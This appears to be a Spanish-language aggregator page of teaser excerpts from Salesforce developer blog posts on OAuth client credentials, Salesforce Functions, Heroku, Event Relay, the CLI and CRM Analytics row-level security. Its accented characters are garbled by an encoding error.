Uso del flujo de credenciales del cliente para una autenticaci贸n API m谩s sencilla 鈽侊笍

Las API de Salesforce ahora son compatibles con las credenciales de cliente de OAuth, lo que facilita m谩s que nunca establecer integraciones de servidor a servidor que no necesariamente necesitan el contexto del usuario.

La publicaci贸n Uso del flujo de credenciales del cliente para una autenticaci贸n API m谩s sencilla apareci贸 primero en el blog de desarrolladores de Salesforce .

Seguir leyendo

Mejore la disponibilidad en su organizaci贸n 鈽侊笍

Est茅 atento a estos antipatrones comunes y utilice estas estrategias para evitarlos y mejorar la disponibilidad en su organizaci贸n.

La publicaci贸n Mejore la disponibilidad en su organizaci贸n apareci贸 por primera vez en el blog de desarrolladores de Salesforce .

Seguir leyendo

La gu铆a para desarrolladores de TrailblazerDX '23 鈽侊笍

Vea lo que TrailblazerDX '23 tiene reservado para desarrolladores en todo el ecosistema de Salesforce, ya sea que se una a nosotros en San Francisco o en Salesforce+.

La publicaci贸n La gu铆a para desarrolladores de TrailblazerDX '23 apareci贸 por primera vez en el blog de desarrolladores de Salesforce .

Seguir leyendo

Las funciones de Salesforce est谩n disponibles en todo el mundo 鈽侊笍

Hoy, nos complace anunciar la disponibilidad global de las funciones de Salesforce, lo que permite a los clientes implementar funciones para procesar datos en una regi贸n de su elecci贸n.

La publicaci贸n Las funciones de Salesforce est谩n disponibles globalmente apareci贸 por primera vez en el blog de desarrolladores de Salesforce .

Seguir leyendo

Resumen de 2022: nuevas funciones para desarrolladores del a帽o pasado 鈽侊笍

Cada a帽o, los desarrolladores de Salesforce se encuentran en el extremo receptor de una cinta transportadora de funciones nuevas importantes y, a veces, esenciales de la plataforma de Salesforce.

La publicaci贸n 2022 en revisi贸n: nuevas funciones para desarrolladores del a帽o pasado apareci贸 primero en el blog de desarrolladores de Salesforce .

Seguir leyendo

Grandes mejoras en la CLI de Salesforce 鈽侊笍

隆No te preocupes, no est谩n rompiendo cambios!

La publicaci贸n Grandes mejoras en la CLI de Salesforce apareci贸 primero en el blog de desarrolladores de Salesforce .

Seguir leyendo

Comience a crear aplicaciones de Salesforce ahora con un nuevo proyecto de Trailhead 鈽侊笍

Los desarrolladores valoran y conf铆an en Salesforce Platform porque simplifica el proceso de creaci贸n de soluciones empresariales seguras. Al utilizar las herramientas y los servicios integrados de la plataforma para la automatizaci贸n, la integraci贸n y m谩s, los desarrolladores pueden lograr el 茅xito comercial m谩s r谩pido. Los desarrolladores de Salesforce abordan problemas comerciales complejos escribiendo c贸digo y utilizando herramientas sin c贸digo que ofrecen funciones simples r谩pidamente. Los [鈥

La publicaci贸n Comenzar a crear aplicaciones de Salesforce ahora con un nuevo proyecto de Trailhead apareci贸 primero en el blog de desarrolladores de Salesforce .

Seguir leyendo

Recetas para acceder a los datos de Heroku desde las funciones de Salesforce 鈽侊笍

En marzo de 2022, anunciamos una nueva funci贸n, Heroku Data en Salesforce Functions, que le permite acceder de forma segura a Heroku Postgres, Heroku Data for Redis y Apache Kafka en Heroku directamente desde su funci贸n. Hoy, estamos lanzando un nuevo conjunto de recetas en nuestra aplicaci贸n de muestra Recetas de funciones que le muestra c贸mo escribir c贸digo [鈥

La publicaci贸n Recetas para acceder a los datos de Heroku desde las funciones de Salesforce apareci贸 primero en el blog de desarrolladores de Salesforce .

Seguir leyendo

Una experiencia de desarrollador completa en Heroku, funciones de Salesforce y AWS 鈽侊笍

En Salesforce, la innovaci贸n es uno de nuestros valores fundamentales. Con eso en mente, nos comprometemos a innovar en las tecnolog铆as de la plataforma Salesforce, como Heroku y Salesforce Functions, as铆 como a trav茅s de nuestra asociaci贸n con AWS, para unificar y mejorar la experiencia del desarrollador. En esta publicaci贸n de blog, le brindamos una descripci贸n general de nuestras actualizaciones recientes, nuestro [鈥

La publicaci贸n Una experiencia de desarrollador completa en Heroku, Salesforce Functions y AWS apareci贸 por primera vez en el blog de desarrolladores de Salesforce .

Seguir leyendo

La retransmisi贸n de eventos de Salesforce est谩 generalmente disponible 鈽侊笍

隆Nos complace anunciar que Event Relay para AWS ya est谩 disponible de forma general! Event Relay es una gran parte de c贸mo estamos construyendo una experiencia de desarrollador unificada que abarca las plataformas de Salesforce y AWS. En esta publicaci贸n, escuchar谩 c贸mo Event Relay ayuda a los desarrolladores a ahorrar tiempo al optimizar la integraci贸n bidireccional impulsada por eventos entre Amazon EventBridge [鈥

La publicaci贸n Salesforce Event Relay est谩 disponible de forma general apareci贸 por primera vez en el blog de desarrolladores de Salesforce .

Seguir leyendo

Funciones interesantes de la plataforma de datos de clientes de Marketing Cloud para desarrolladores 鈽侊笍

La plataforma de datos de clientes (CDP) de Marketing Cloud existe desde hace un tiempo. Sin embargo, es posible que a煤n no est茅s familiarizado con 茅l. En nuestra publicaci贸n de blog anterior, discutimos la importancia de CDP en el contexto de Salesforce Genie. Esta publicaci贸n de blog lo guiar谩 a trav茅s de las funciones geniales que CDP tiene disponibles para los desarrolladores. [鈥

La publicaci贸n Caracter铆sticas interesantes de la plataforma de datos de clientes de Marketing Cloud para desarrolladores apareci贸 primero en el blog de desarrolladores de Salesforce .

Seguir leyendo

CRM Analytics: seguridad de datos para controlar el acceso a las filas

脷ltima actualizaci贸n el 7 de noviembre de 2022 por Rakesh Gupta Gran idea o pregunta duradera: 驴C贸mo protegen los filtros predicados sus conjuntos de datos de CRM Analytics en funci贸n de los requisitos de seguridad? Objetivos: despu茅s de leer este blog, podr谩: Usar filtros predicados para proteger conjuntos de datos Aplicar herencia de uso compartido para agregar seguridad adicional a

La publicaci贸n CRM Analytics: seguridad de datos para controlar el acceso a las filas apareci贸 primero en Automation Champion .

Seguir leyendo

Haz lo Imposible en Apex con Funciones de Salesforce 鈽侊笍

Los desarrolladores de Apex tienen acceso a una gran cantidad de recursos que pueden ayudarlos a mejorar la calidad de su desarrollo. Pueden obtener informaci贸n sobre las nuevas funciones de Trailhead. Pueden ver ejemplos de mejores pr谩cticas en Recetas de Apex. Pueden colaborar en Trailblazer Community y Salesforce Stack Exchange. Pero hay un recurso que ha faltado [鈥

La publicaci贸n Haga lo imposible en Apex con funciones de Salesforce apareci贸 por primera vez en el blog de desarrolladores de Salesforce .

Seguir leyendo